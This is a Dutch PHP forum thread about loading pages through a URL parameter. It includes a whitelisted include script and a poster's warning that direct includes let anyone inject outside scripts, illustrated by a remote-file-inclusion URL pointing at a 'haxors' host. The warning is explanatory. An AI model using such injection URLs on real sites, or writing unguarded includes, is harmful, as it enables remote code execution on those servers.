De PHPhulp kroeg
PHP pagina load
Code (php)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
<?php
//Een lijst ('array') met bestanden maken die zijn toegestaan. Als je dus wilt toestaan dat 'blaat.php' geinclude wordt voeg je blaat toe aan de array. Denk erom dat er achter elk item(behalve de laatste) een komma moet
$pages = array(
'pagina0',
'pagina1',
'pagina2'
);
//Als er niets achter ?p= staat (pagina.php?p=) dan wordt de standaard pagina gebruikt.
if(empty($_GET['p']))
{
include 'standaard.php';
}
else
{
//Er staat iets achter, we kijken nu of de pagina die er achter ?p= staat ook in de array voorkomt en dus toegestaan is. Het ! voor in array geeft aan dat er NIET aan de volwaarde voldaan wordt. Hier staat dus: 'Als de pagina niet in de array zit, dan:'
if(!in_array($_GET['p'], $pages))
{
echo 'Niet toegestaan!';
}
else
{
//De pagina mag geinclude worden volgens onze array, met file_exists kijken we of het bestand wel bestaat, je kan hem immers vergeten zijn toe te voegen. Let ook weer op het !.
if(!file_exists('paginas/' . $_GET['p'] . '.php'))
{
echo 'Het bestand ' . $_GET['p'] . '.php is niet gevonden!';
}
else
{
//Het bestand is geldig en bestaatd, dus wordt geinclude
include 'paginas/' . $_GET['p'] . '.php';
}
}
}
?>
//Een lijst ('array') met bestanden maken die zijn toegestaan. Als je dus wilt toestaan dat 'blaat.php' geinclude wordt voeg je blaat toe aan de array. Denk erom dat er achter elk item(behalve de laatste) een komma moet
$pages = array(
'pagina0',
'pagina1',
'pagina2'
);
//Als er niets achter ?p= staat (pagina.php?p=) dan wordt de standaard pagina gebruikt.
if(empty($_GET['p']))
{
include 'standaard.php';
}
else
{
//Er staat iets achter, we kijken nu of de pagina die er achter ?p= staat ook in de array voorkomt en dus toegestaan is. Het ! voor in array geeft aan dat er NIET aan de volwaarde voldaan wordt. Hier staat dus: 'Als de pagina niet in de array zit, dan:'
if(!in_array($_GET['p'], $pages))
{
echo 'Niet toegestaan!';
}
else
{
//De pagina mag geinclude worden volgens onze array, met file_exists kijken we of het bestand wel bestaat, je kan hem immers vergeten zijn toe te voegen. Let ook weer op het !.
if(!file_exists('paginas/' . $_GET['p'] . '.php'))
{
echo 'Het bestand ' . $_GET['p'] . '.php is niet gevonden!';
}
else
{
//Het bestand is geldig en bestaatd, dus wordt geinclude
include 'paginas/' . $_GET['p'] . '.php';
}
}
}
?>
maar nu doen links het niet lol
http://gaatjullieniksaan:D/index.php?=Design/Portfolio/index.php
zon link gebruik ik nu
Maar ook al haal ik het .php weg, het blijft de index pagina reloaden
en dat van jou evert, blijft het ook reloaden xD
Gewijzigd op 01/01/1970 01:00:00 door Ruben Kok
Gewijzigd op 01/01/1970 01:00:00 door --
'Ruben:
Ik include de index, ja
En dat doe je in de index? Tja dan heb je een oneindige loop.
ok bedankt.... srry voor het zoveel posten.
'Maarten:
de lekkere onveilige manier:
dan moet de link wel "blablabal.com/index.php?page=blababal.php" worden, maar goed
veiligere manieren zijn er meerdere, ik kijk bijv of ik wel een link naar het bestandje in m'n database heb staan, zo niet, wordt er gewoon gezegd dat de pagina niet beschikbaar is (anders kun je namelijk gewoon een scriptje 'uit de buitenwereld' invoegen, door "blablabal.com/index.php?page=http://www.haxors.nl/hack.php" in te voeren)
dan moet de link wel "blablabal.com/index.php?page=blababal.php" worden, maar goed
veiligere manieren zijn er meerdere, ik kijk bijv of ik wel een link naar het bestandje in m'n database heb staan, zo niet, wordt er gewoon gezegd dat de pagina niet beschikbaar is (anders kun je namelijk gewoon een scriptje 'uit de buitenwereld' invoegen, door "blablabal.com/index.php?page=http://www.haxors.nl/hack.php" in te voeren)
Als hij dat wilt, moet hij dat doen; dan kan ik weer eens de beveiliging testen :) (Ben ik goed in)
En ik gebruik al een veel veiligere manier :P